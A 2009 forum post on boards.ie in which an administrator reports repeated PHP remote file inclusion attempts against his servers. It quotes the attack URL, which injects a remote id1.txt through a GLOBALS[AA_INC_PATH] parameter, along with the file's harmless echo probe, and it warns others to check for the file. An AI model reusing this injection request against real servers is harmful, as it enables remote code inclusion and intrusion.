Help Keep Boards Alive. Support us by going ad free today. See here: https://subscriptions.boards.ie/.
If we do not hit our goal we will be forced to close the site.

Current status: https://keepboardsalive.com/

Annual subs are best for most impact. If you are still undecided on going Ad Free - you can also donate using the Paypal Donate option. All contribution helps. Thank you.

https://www.boards.ie/group/1878-subscribers-forum

Private Group for paid up members of Boards.ie. Join the club.

id1.txt PHP RFI - Fx29ID

biko · 2009-11-03 11:59:15

Little hackers have been trying to get at my servers a while now, using a PHP file inclusion exploit. For some reason they always use the same name on the payload file - id1.txt In this instance they've tried to append to a URL on my server…

03-11-2009 12:59PM

#1

biko

Registered Users, Registered Users 2 Posts: 81,060 ✭✭✭✭

Join Date: July 2005

Posts: 75468

Little hackers have been trying to get at my servers a while now, using a PHP file inclusion exploit. For some reason they always use the same name on the payload file - id1.txt

In this instance they've tried to append to a URL on my server ****/cron.php?GLOBALS[AA_INC_PATH]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt???
File content is
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

More info here

Could be worth having a look through your servers for id1.txt

1